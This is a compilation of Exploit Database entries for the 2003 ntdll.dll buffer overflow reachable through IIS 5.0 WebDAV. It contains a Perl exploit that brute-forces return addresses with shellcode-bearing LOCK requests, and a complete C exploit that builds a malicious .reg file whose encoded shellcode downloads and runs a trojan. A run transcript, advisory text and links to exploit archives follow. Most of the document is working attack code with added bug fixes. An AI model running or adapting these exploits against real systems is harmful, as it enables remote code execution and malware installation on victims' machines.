"%uaca4%u6c0f",
"%uaca4%u77e9",
"%uacac%u6c0f",
"%uacaf%u77e3",
"%uacb6%u6ed3",
"%uacc8%u7693",
"%uace0%u7761",
"%uacfb%u7761",
"%uad0d%u77e2",
"%uad13%u7900",
"%uad18%u779e",
"%uad25%u7900",
"%uad27%u6ed3",
"%uad45%u77e2",
"%uad5b%u7900",
"%uad5f%u7387",
"%uad73%u6995",
"%uad73%u6b32",
"%uad7a%u6b32",
"%uada6%u775b",
"%uadab%u7900",
"%uadc4%u7387",
"%uadf0%u76ae",
"%uadf9%u6995",
"%uae12%u76ae",
"%uae80%u77e5",
"%uae96%u77e5",
"%uaf17%u77e3",
"%uafa2%u779e",
"%ub00a%u77e5",
"%ub05d%u77e5",
"%ub0c0%u6b32",
"%ub0ef%u7518",
"%ub100%u6b32",
"%ub100%u7518",
"%ub119%u7518",
"%ub138%u672e",
"%ub169%u6b32",
"%ub177%u672e",
"%ub181%u6b32",
"%ub1cb%u6ed4",
"%ub1da%u6ed4",
"%ub206%u6b32",
"%ub216%u6c0f",
"%ub23f%u7802",
"%ub240%u7693",
"%ub246%u6c0f",
"%ub260%u7693",
"%ub273%u76ae",
"%ub276%u6c0f",
"%ub27e%u779e",
"%ub288%u76ae",
"%ub293%u77e2",
"%ub29c%u72fd",
"%ub2a3%u6c0f",
"%ub2b7%u72fd",
"%ub2ca%u77e2",
"%ub2ef%u76ae",
"%ub342%u76ae",
"%ub3a2%u749e",
"%ub3b8%u749e",
"%ub3be%u749e",
"%ub3c3%u741b",
"%ub3f4%u741b",
"%ub405%u7802",
"%ub43a%u76ae",
"%ub44e%u6df1",
"%ub44e%u778b",
"%ub450%u76ae",
"%ub456%u6df1",
"%ub456%u778b",
"%ub468%u6ed3",
"%ub483%u76ae",
"%ub484%u72fd",
"%ub48b%u72fd",
"%ub498%u76ae",
"%ub4a6%u6995",
"%ub4af%u76ae",
"%ub4c0%u76ae",
"%ub4e8%u7832",
"%ub52d%u6995",
"%ub549%u77db",
"%ub554%u6995",
"%ub565%u77db",
"%ub56e%u77e9",
"%ub61d%u7763",
"%ub61f%u77e9",
"%ub62c%u7763",
"%ub652%u77e9",
"%ub65e%u77e9",
"%ub66a%u77e9",
"%ub6a4%u77db",
"%ub6a7%u7900",
"%ub6af%u6ed4",
"%ub6b7%u6ed4",
"%ub6b8%u77db",
"%ub6d5%u7900",
"%ub6dd%u77ad",
"%ub6dd%u77b0",
"%ub6ec%u77ad",
"%ub6ec%u77b0",
"%ub6f4%u77ad",
"%ub6f4%u77b0",
"%ub6f7%u7763",
"%ub6fc%u749e",
"%ub70e%u77ad",
"%ub712%u749e",
"%ub718%u749e",
"%ub778%u77e9",
"%ub784%u77e9",
"%ub790%u77e9",
"%ub79c%u77e9",
"%ub7a8%u77e9",
"%ub7ac%u77ad",
"%ub7b4%u77e9",
"%ub7c0%u77e9",
"%ub7cc%u77e9",
"%ub7d8%u77e9",
"%ub803%u775b",
"%ub819%u77ad",
"%ub992%u7763",
"%ub9aa%u7832",
"%ub9ce%u7763",
"%ub9d6%u7832",
"%uba10%u7832",
"%uba38%u7832",
"%uba6b%u77ad",
"%uba6b%u77b0",
"%uba73%u77ac",
"%uba74%u77ad",
"%uba74%u77b0",
"%uba7a%u77ad",
"%uba7a%u77b0",
"%uba7e%u77ad",
"%uba7e%u77b0",
"%uba8e%u7834",
"%uba9f%u7900",
"%ubaa8%u7834",
"%ubaae%u6876",
"%ubae8%u7900",
"%ubb34%u6876",
"%ubc0f%u77e5",
"%ubc37%u77e5",
"%ubcf9%u7834",
"%ubd00%u6c0f",
"%ubd24%u7834",
"%ubd38%u6c0f",
"%ubd65%u6c0f",
"%ubdb3%u672e",
"%ubdc8%u7740",
"%ubde6%u77db",
"%ube03%u672e",
"%ube1a%u7740",
"%ube30%u7901",
"%ube31%u77e5",
"%ube43%u7901",
"%ube53%u6995",
"%ube65%u77db",
"%ube75%u77e5",
"%ube87%u77db",
"%ubebd%u77db",
"%ubecf%u6995",
"%ubef8%u6995",
"%ubf37%u7834",
"%ubf45%u7834",
"%ubf65%u76ae",
"%ubf83%u7900",
"%ubf8a%u6995",
"%ubf92%u7900",
"%ubf9e%u7900",
"%ubfaa%u7900",
"%ubfba%u76ae",
"%ubfbf%u6c7e",
"%ubfc5%u77db",
"%ubfd2%u7900",
"%ubfe1%u7900",
"%ubfed%u7900",
"%ubff9%u7900",
"%uc003%u76ae",
"%uc02e%u77db",
"%uc02f%u77db",
"%uc036%u6995",
"%uc03a%u77db",
"%uc03e%u6c7e",
"%uc03f%u6995",
"%uc054%u76ae",
"%uc058%u6c7e",
"%uc0d5%u76ae",
"%uc0ee%u76ae",
"%uc120%u76ae",
"%uc142%u76ae",
"%uc189%u65f1",
"%uc1bc%u65f1",
"%uc1ef%u65f1",
"%uc1f3%u6b32",
"%uc1f7%u77e2",
"%uc21f%u6b32",
"%uc268%u76ae",
"%uc268%u77e2",
"%uc277%u76ae",
"%uc27f%u7834",
"%uc286%u76ae",
"%uc291%u77e2",
"%uc295%u76ae",
"%uc2a8%u76ae",
"%uc2d1%u76ae",
"%uc2e0%u76ae",
"%uc2ef%u76ae",
"%uc2fe%u76ae",
"%uc306%u7834",
"%uc30d%u76ae",
"%uc32a%u7834",
"%uc344%u7834",
"%uc35e%u7834",
"%uc39d%u6ed4",
"%uc3de%u6ed4",
"%uc3df%u6df1",
"%uc3df%u778b",
"%uc401%u7834",
"%uc445%u7834",
"%uc449%u6df1",
"%uc449%u778b",
"%uc459%u7834",
"%uc4f0%u7834",
"%uc504%u77dc",
"%uc56b%u7834",
"%uc578%u77e9",
"%uc57a%u6c0f",
"%uc583%u76ae",
"%uc597%u76ae",
"%uc5d6%u77ac",
"%uc5d7%u77ac",
"%uc5e1%u77ac",
"%uc5eb%u77ac",
"%uc663%u76ae",
"%uc676%u6e44",
"%uc676%u6e5e",
"%uc677%u76ae",
"%uc6f3%u6c42",
"%uc748%u76ae",
"%uc776%u76ae",
"%uc7a0%u77e2",
"%uc7da%u6b32",
"%uc7e1%u6b32",
"%uc7e5%u77e2",
"%uc860%u72c2",
"%uc860%u775b",
"%uc86d%u72c2",
"%uc86d%u775b",
"%uc87d%u72c2",
"%uc87d%u775b",
"%uc88d%u72c2",
"%uc88d%u775b",
"%uc89d%u72c2",
"%uc89d%u775b",
"%uc8ad%u72c2",
"%uc8ad%u775b",
"%uc8ba%u72c2",
"%uc8ba%u775b",
"%uc8c7%u72c2",
"%uc8c7%u775b",
"%uc8d4%u72c2",
"%uc8d4%u775b",
"%uc8e0%u77ac",
"%uc8fc%u77db",
"%uc936%u77db",
"%uc9d3%u77ac",
"%uc9f5%u6c0f",
"%uca02%u77ac",
"%uca25%u77ac",
"%uca2e%u6c0f",
"%uca5b%u77e9",
"%uca84%u77e9",
"%ucad1%u77e9",
"%ucaf1%u77e9",
"%ucb4f%u749e",
"%ucb72%u76ae",
"%ucb7a%u751a",
"%ucb7b%u76ae",
"%ucb7e%u7763",
"%ucb85%u7763",
"%ucb8f%u751a",
"%ucb98%u749e",
"%ucba4%u751a",
"%ucbae%u749f",
"%ucbd0%u77db",
"%ucc05%u749f",
"%ucc53%u76ae",
"%ucc81%u6df5",
"%ucc89%u6df5",
"%ucc8a%u76ae",
"%uccb5%u7901",
"%uccc7%u760d",
"%uccd6%u741b",
"%uccda%u760d",
"%ucd00%u741b",
"%ucd0f%u7901",
"%ucd2a%u741b",
"%ucd31%u7901",
"%ucd3c%u7518",
"%ucd3c%u7901",
"%ucdb0%u7761",
"%ucdb5%u7761",
"%ucdb8%u7761",
"%ucdf4%u741b",
"%ucdf9%u77e5",
"%uce2e%u7518",
"%uce46%u741b",
"%uce6a%u77e5",
"%uce74%u7518",
"%uce93%u77e5",
"%uce98%u7518",
"%ucf69%u6df5",
"%ucf71%u6df5",
"%ucf9c%u76ae",
"%ucfa6%u76ae",
"%ud067%u77db",
"%ud0a2%u77db",
"%ud0c5%u6b32",
"%ud109%u6b32",
"%ud11b%u77dc",
"%ud163%u7901",
"%ud17c%u7900",
"%ud181%u7900",
"%ud1a6%u749f",
"%ud1d2%u77ac",
"%ud1e0%u7901",
"%ud1ed%u77ac",
"%ud1f7%u749f",
"%ud1f7%u7900",
"%ud1fc%u7900",
"%ud206%u7763",
"%ud21c%u7834",
"%ud221%u7763",
"%ud225%u7834",
"%ud259%u6df5",
"%ud279%u749f",
"%ud287%u7834",
"%ud290%u7834",
"%ud2b6%u77e5",
"%ud2cd%u7900",
"%ud2d2%u7900",
"%ud2e1%u741b",
"%ud2f5%u741b",
"%ud2f5%u77e5",
"%ud309%u741b",
"%ud31d%u741b",
"%ud38a%u7901",
"%ud3aa%u7763",
"%ud3b9%u7763",
"%ud3bf%u7901",
"%ud3d7%u7763",
"%ud3db%u77dc",
"%ud4f5%u6b32",
"%ud514%u77ac",
"%ud51e%u77ac",
"%ud52d%u77e5",
"%ud539%u6b32",
"%ud541%u6df5",
"%ud545%u7800",
"%ud6dc%u77d7",
"%ud6e2%u77a5",
"%ud700%u77e2",
"%ud75b%u7900",
"%ud780%u7900",
"%ue00e%u7900",
"%ue010%u7738",
"%ue020%u77db",
"%ue02b%u77ac",
"%ue04c%u7738",
"%ue04e%u6ed4",
"%ue056%u6ed4",
"%ue0ad%u779e",
"%ue0af%u7800",
"%uec00%u672e",
"%uf906%u7800",
"%uf909%u7763",
"%uf93f%u7763",
"%uf942%u751a",
"%uf94b%u77e9",
"%uf964%u77ac",
"%uf966%u7763",
"%uf968%u751a",
"%uf974%u77ac",
"%uf981%u751a",
"%uf991%u7763",
"%uf9a6%u7300",
"%uf9b3%u751a",
"%uf9c2%u7763",
"%uf9cd%u751a",
"%uf9e9%u7763",
"%uf9fb%u7300"
);
# Main loop: one attempt per candidate return address.  Each attempt first
# waits until the target answers a plain GET (so a server still restarting
# after the previous crash is not counted as a result), then sends a single
# LOCK request whose URI is
#   "/" . <offset_len filler> . <return-address part> . <decoder + shellcode + "A" padding>
# and classifies the outcome only by whether the connection was refused
# afterwards.  A refused connection is taken to mean the previous request
# crashed the server (i.e. the address was wrong); a successful exploit
# leaves no visible trace here beyond the user the payload adds.
foreach my $return_address (@return_addresses)
{
######### return address ############
# Three fixed %u units, the candidate address, then 22 units of %ucc38.
# NOTE(review): read as little-endian bytes these are 73 30 / 75 30 / 74 30
# (jae/jne/je +0x30, i.e. an unconditional short skip) and 38 cc
# (cmp ah,cl filler) -- inferred from the byte values, not stated by the
# author.
my $return_address_part="";
$return_address_part="";
$return_address_part.="%u3073";
$return_address_part.="%u3075";
$return_address_part.="%u3074";
$return_address_part.=$return_address;
$return_address_part.="%ucc38"x22;
#####################################
############ offsets ##############
# Filler before the return-address part; 280 is the distance the author
# found for the tested ntdll.dll build (see the header comment).
my $offset_len=280;
my $offset_part="X"x$offset_len;
#####################################
# Lengths are counted in decoded units: each "%uXXXX" is 6 characters of
# URI but one UTF-16 unit once the server decodes it, hence the /6.
my $shellcode_len=$url_len-(length($return_address_part)/6+$offset_len);
my $offset_of_part_shell=0;
print "len-> $url_len=$shellcode_len:$offset_len\n";
# Decoder stub in %u form (e.g. "%uC931" -> 31 C9 = xor ecx,ecx); it
# rewrites the printable-encoded shellcode that follows back into code.
my $decoder_str="%uC931%u79B1%uc1fe%ucb01%uc38b%uc789%uc289%uc931%u9041%u9041%uc38b%uc801%u338b%uce8b%u308b%uc68b%uc801%u00b4%uc689%uc78b%u3089%uc931%u03b1%u9041%ucb01%u9047%uf989%ud129%uc031%ue0b0%u03b4%uc129%uc985%uca75%uc985";
my $decoder_str_len=length($decoder_str)/6;
# Four printable bytes the author labels "patch esp", placed between the
# NOP pair and the encoded shellcode; their decoded meaning is not
# documented here.
my $patch_esp="\x44\x45\x76\x76";
my $nop="%u0048%u0048";
my $encoded_str="${nop}${patch_esp}${shellcode}";
# Constant used to reconcile raw-character and %u-unit counts in the
# padding arithmetic below; kept exactly as the author wrote it.
my $unicoded_encoded_str_len=4*5;
my $shellcode_part="";
$shellcode_part="";
$shellcode_part.=$decoder_str;
$shellcode_part.=$encoded_str;
# Pad with "A" so the decoded URI comes out at $url_len units.
$shellcode_part.="A"x($shellcode_len-($decoder_str_len+length($encoded_str)-$unicoded_encoded_str_len-1));
my $url="/${offset_part}${return_address_part}${shellcode_part}";
# Single-element list: only LOCK is tried (the author notes SEARCH needs
# a different $url_len).
for my $METHOD ("LOCK")
{
my $string_to_send="$METHOD $url HTTP/1.1\r\n${host_header}${destination}${lock_token}${translate_f}${depth}Content-Type: text/xml\r\nContent-Length: $length_of_body\r\n${connection_str}\r\n${body}";
my $results="";
$results="";
# Block until the target accepts a connection and answers a GET; this
# loop has no upper bound, so a permanently-down target hangs the script.
while($results eq "")
{
print STDERR "Retrying Connection...\n";
$results=sendraw2("GET / HTTP/1.0\r\n\r\n",$host,$port,15);
if($results eq "")
{
sleep(1);
}
}
print STDERR "Trying with [$return_address]\n";
$results=sendraw2($string_to_send,$host,$port,15);
# sendraw2() returns "" only when connect() fails; anything else (a reply,
# "0" for a socket error, "Timeout") counts as "server still up".
if($results eq "")
{
print "Connection refused: Server crashed?\n";
}else{
print "Failed to exploit: Server not crashed\n";
}
}
}
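# Connect to $realip:$realport, send $pstr and return everything the peer
# sends back as one string.  $timeout (seconds) bounds both the connect and
# the read through SIGALRM, whose handler is ermm().
#
# Return values are kept from the original because the caller tests them:
#   ""         connect() failed, or the name could not be resolved
#              (the caller treats this as "server down")
#   "0"        socket() failed
#   "Timeout"  the alarm fired during the read
#   otherwise  the raw response
#
# Fixes relative to the original:
#   - it declared `my $flagexit` inside this sub, but ermm() sets the
#     package global $flagexit, so the "Timeout" result could never be
#     produced; the global is used now and reset on every call, and it is
#     also checked after the read loop (the handler closes S, which ends
#     the loop without another iteration, so an in-loop check alone never
#     fires);
#   - the connect-failure path now cancels the pending alarm;
#   - an unresolvable name is reported like a failed connect instead of
#     packing an undefined address;
#   - output goes through an explicit handle instead of leaving S selected
#     as the default output handle for the duration of the read.
sub sendraw2
{
	my ($pstr,$realip,$realport,$timeout)=@_;
	my $target2=inet_aton($realip);
	return "" unless defined $target2;

	$main::flagexit=0;
	$SIG{ALRM}=\&ermm;
	socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "0";

	alarm($timeout);
	unless(connect(S,sockaddr_in($realport,$target2)))
	{
		alarm(0);
		close(S);
		return "";
	}
	alarm(0);

	# Autoflush S so the whole request leaves before we block on the reply.
	my $previous=select(S); $|=1; select($previous);
	print S $pstr;

	my @in;
	alarm($timeout);
	while(<S>){
		push @in, $_;
	}
	alarm(0);
	close(S);
	return "Timeout" if $main::flagexit == 1;
	return join '',@in;
}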
# SIGALRM handler used by sendraw2(): record that the timeout fired (in the
# package global $flagexit) and close the socket so a blocked read returns.
sub ermm
{
	$flagexit = 1;
	close S;
	return;
}
Exploit Database EDB-ID : 22366
Publication date : 2003-03-30 22h00 +00:00
Author : ThreaT
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.
/***************************************
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
*@ REGEDIT Buffer Overflow Exploit ! @*
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
* *
* Discovered & coded By ThreaT. *
* *
*#####################################*
*# ->
[email protected] #*
*# -> http://www.chez.com/mvm #*
*# -> http://s0h.cc/~threat #*
*#####################################*
* Date : 31/03/2003 *
***************************************
*/
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* This exploit creates a malicious .reg file. *
* When regedit tries to write its data into *
* the registry it overwrites the return addr, *
* because an unchecked ReadFile() call works *
* on a static buffer; the arbitrary code then *
* downloads a trojan and runs it locally *
* without asking the user. *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-> compile : cl regexploit.c
usage : regexploit.exe <url>
<url> is a full link to an executable file, it can be like
http://www.host.com/trojan.exe or file://c:/path/executable.exe
*/
// Tested on Win2k pro & server (fr) SP0 SP1 SP2 & SP3
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
HANDLE RegFile; /* handle to the generated VulnFile.reg: opened in main(), written by Write() */
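/*
 * Convert an ANSI (CP_ACP) string to a NUL-terminated UTF-16 string.
 *
 * Returns a malloc()ed buffer, cast to char* because the caller writes it
 * out with a byte count (strlen()*2), or NULL on a NULL input, a failed
 * conversion, or a failed allocation.  The caller owns the result and is
 * responsible for free()ing it.
 *
 * Fix: the original allocated nBufSize + 1 *bytes*, but MultiByteToWideChar()
 * reports the size in WCHARs, so every string longer than one character
 * overflowed the heap allocation by roughly half its length.  The result of
 * the sizing call and of malloc() were also never checked.
 */
char *ToWideChar(const char *cszANSIstring)
{
	int nBufSize;
	WCHAR *wideString;

	if (cszANSIstring == NULL)
		return NULL;

	/* Sizing pass: with cbMultiByte == -1 the returned count (in WCHARs)
	 * includes the terminating NUL. */
	nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0);
	if (nBufSize <= 0)
		return NULL;

	wideString = malloc((size_t)nBufSize * sizeof *wideString);
	if (wideString == NULL)
		return NULL;

	if (MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize) == 0) {
		free(wideString);
		return NULL;
	}
	return (char *)wideString;
}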
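/*
 * Append `number` bytes of `str` to the global RegFile.
 *
 * The original discarded WriteFile()'s result, so a failed or short write
 * produced a truncated .reg file with no indication.  Failures are now
 * reported on stdout; the signature stays void so existing callers (which
 * pass ToWideChar() results directly) are unaffected.  A NULL `str` -- which
 * ToWideChar() can now return on error -- is reported instead of being
 * handed to WriteFile().
 */
void Write(const char *str, int number)
{
	DWORD lpNumberOfBytesWritten = 0;

	if (str == NULL || number < 0) {
		printf("Write: bad argument (str=%p, number=%d)\n", (const void *)str, number);
		return;
	}
	if (!WriteFile(RegFile, str, (DWORD)number, &lpNumberOfBytesWritten, NULL)
	    || lpNumberOfBytesWritten != (DWORD)number) {
		printf("Write: WriteFile failed or short write (%lu of %d bytes, error %lu)\n",
		       (unsigned long)lpNumberOfBytesWritten, number,
		       (unsigned long)GetLastError());
	}
}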
/*
 * Entry point.  Usage: regexploit.exe <url>
 *
 * Writes VulnFile.reg in the current directory: a UTF-16 .reg header, then a
 * 261-character quoted value ('"' followed by 260 '0') converted to UTF-16,
 * then RealGenericShellcode[] as raw bytes with the XOR-encoded URL appended.
 * argv[1] is modified in place by the encoding loop, so a plain copy (myurl)
 * is kept for the final message.
 *
 * NOTE(review): declared `void main`; should be `int main`.  Both error paths
 * call ExitProcess(0), i.e. report success.  Nothing allocated here is freed,
 * which is harmless only because the process exits right afterwards.
 */
void main (int argc, char *argv[])
{
int i;
char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n"
"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n",
*MastaBuff, *myurl,
RealGenericShellcode[] =
"\xAA\xC6\x02\x01" // return address
// nop
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// shellcode decoder
"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
"\x34\x99\xAA\x84\xC0\x75\xF8"
// shellcode XOR-encoded with 0x99
"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
"\x66\x49\x71\xe6\x66\x66\x66";
printf ("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
"Regedit.exe Buffer Overflow Exploit\n"
"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
"Discovered & Coded By ThreaT.\n\n"
"contact :
[email protected]\n"
"URL : http://www.chez.com/mvm\n\n");
/* argv[argc] is NULL, so this catches a missing argument */
if (!argv[1])
{
printf ("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"
"Usage : regexploit.exe <URL://trojan.exe>\n"
"Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe\n"
"_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n");
ExitProcess (0);
}
/* Create the malicious .reg file */
RegFile = CreateFile ("VulnFile.reg",GENERIC_WRITE,FILE_SHARE_WRITE,
NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (RegFile == INVALID_HANDLE_VALUE)
{
printf ("Cannot create a vuln regfile !\n");
ExitProcess (0);
}
Write ("\xFF\xFE",2); // UTF-16LE byte-order mark that opens a Unicode .reg file
Write (ToWideChar (entete),strlen (entete)*2); // regedit header as UTF-16; strlen*2 is the byte length without the terminator
MastaBuff = (char *) LocalAlloc (LPTR,270); // LPTR zero-fills, so the value below stays NUL-terminated
MastaBuff[0] = '"'; memset (&MastaBuff[1],'0',260); // quoted value: '"' followed by 260 '0' characters
Write (ToWideChar (MastaBuff),strlen (MastaBuff)*2); // first part of the overlong value, as UTF-16
myurl = (char *) LocalAlloc (LPTR, strlen (argv[1])+10); // plain copy of the URL for the final message
lstrcpy (myurl,argv[1]);
for (i=0; i < strlen (argv[1]); argv[1][i++]^=0x99); // XOR-encode the URL in place (same 0x99 key as the shellcode); strlen() is re-evaluated every iteration
lstrcat (RealGenericShellcode,argv[1]); // append the encoded URL to the shellcode
// NOTE(review): RealGenericShellcode is a fixed-size stack array sized by its
// initializer and lstrcat() has no bound, so a long <url> overruns this
// program's own stack.
lstrcat (RealGenericShellcode,"\x99"); // terminator byte
Write (RealGenericShellcode,strlen (RealGenericShellcode)); // append the blob as raw bytes (not UTF-16); strlen() stops at the first 0x00, so the blob must be NUL-free
CloseHandle (RegFile);
printf ("un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree\n"
"pour downloader et executer '%s'\n",myurl);
}
/*********************
D:\code\exploits\regedit>cl regexploit.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
regexploit.c
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
/out:regexploit.exe
regexploit.obj
D:\code\exploits\regedit>regexploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.
contact :
[email protected]
URL : http://www.chez.com/mvm
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Usage : regexploit.exe <URL://trojan.exe>
Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
D:\code\exploits\regedit>regexploit file://c:/winnt/system32/cmd.exe
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.
contact :
[email protected]
URL : http://www.chez.com/mvm
un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree
pour downloader et executer 'file://c:/winnt/system32/cmd.exe'
D:\code\exploits\regedit>dir VulnFile.reg
Le volume dans le lecteur D n'a pas de nom.
Le numéro de série du volume est 90CC-3FC3
Répertoire de D:\code\exploits\regedit
31/03/2003 14:54 1 015 VulnFile.reg
1 fichier(s) 1 015 octets
0 Rép(s) 5 602 033 664 octets libres
D:\code\exploits\regedit>VulnFile.reg
D:\code\exploits\regedit>
Êtes-vous sûr de vouloir ajouter l'information dans d:\code\exploits\regedit\VulnFile.reg
dans le registre ?
-> OUI
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
D:\code\exploits\regedit>
this is too easy...
*********************/
Exploit Database EDB-ID : 22367
Publication date : 2003-04-03 22h00 +00:00
Author : Morning Wood
EDB Verified : Yes
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22367.zip
Exploit Database EDB-ID : 22368
Publication date : 2003-03-16 23h00 +00:00
Author : [email protected]
EDB Verified : Yes
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22368.tar.gz
Exploit Database EDB-ID : 16470
Publication date : 2010-07-24 22h00 +00:00
Author : Metasploit
